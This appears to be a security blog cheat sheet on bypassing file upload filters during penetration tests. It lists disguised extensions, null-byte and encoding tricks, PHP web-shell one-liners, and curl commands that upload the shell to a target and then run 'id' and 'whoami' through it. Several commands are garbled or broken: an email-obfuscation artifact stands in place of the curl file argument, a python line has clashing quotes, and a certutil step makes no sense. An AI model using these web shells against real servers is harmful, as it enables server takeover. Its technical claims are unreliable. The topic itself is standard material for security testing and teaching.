File Upload Bypass Techniques for Penetration Testing

By /

Listen to this Post

Featured Image
File upload vulnerabilities are a common attack vector in web applications. Attackers exploit weak validation mechanisms to upload malicious files, leading to server compromise. Below are bypass techniques for both blacklisting and whitelisting approaches.

Blacklisting Bypass

Blacklisting blocks specific file extensions, but attackers can use alternative extensions:
– PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, `.module`
– ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtml, .vbhtml, .asa, `.cer`
– JSP: .jsp, .jspx, .jsw, .jsv, `.jspf`
– ColdFusion: .cfm, .cfml, .cfc, `.dbm`
– Perl: .pl, `.cgi`
– Random Capitalization: .pHp, .pHP5, `.PhAr`

Whitelisting Bypass

Whitelisting allows only specific extensions, but these tricks can bypass it:
– Double Extensions: file.png.php, `file.png.Php5`
– Null Byte Injection: file.php%00.png, `file.php\x00.png`
– URL Encoding: file.php%20, `file.php%0a`
– Trailing Characters: file.php., `file.php….`
– Path Manipulation: file.php/, `file.php.\`
– Fake Extensions: file.php.png, `file.phpJunk123png`

You Should Know:

Practical Exploitation Steps

1. Identify Upload Functionality

  • Use Burp Suite or browser dev tools to inspect file upload forms.

2. Test Blacklist Bypass

curl -F "[email protected]" http://target.com/upload

3. Test Whitelist Bypass

mv shell.php shell.png.php
python3 -c 'print("<?php system($_GET['cmd']); ?>")' > shell.php%00.png

4. Null Byte Exploitation (PHP)

echo '<?php system($_REQUEST["cmd"]); ?>' > exploit.php%00.jpg

5. Check for Server-Side Execution

curl http://target.com/uploads/exploit.php%00.jpg?cmd=id

6. Alternative Extensions (Windows)

ren shell.php shell.php.jpg
certutil -encode shell.php.jpg shell.php

7. Bypass Content-Type Check

curl -F "[email protected];type=image/png" http://target.com/upload

What Undercode Say

File upload vulnerabilities remain a critical security issue due to improper validation. Always:
– Use whitelisting over blacklisting.
– Implement file content verification (e.g., magic bytes).
– Store uploads in a non-executable directory.
– Apply server-side scanning for malicious files.

Expected Output:

A successful bypass leads to remote code execution (RCE): 

curl http://target.com/uploads/shell.php?cmd=whoami

If defenses are weak, attackers gain full server control.

Prediction

As web apps adopt stricter upload filters, attackers will shift to polyglot files (e.g., PDFs with PHP) and API-based bypasses. AI-driven file analysis may become the next battleground.

Relevant URLs:

IT/Security Reporter URL:

Reported By: Shahidul Islam – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: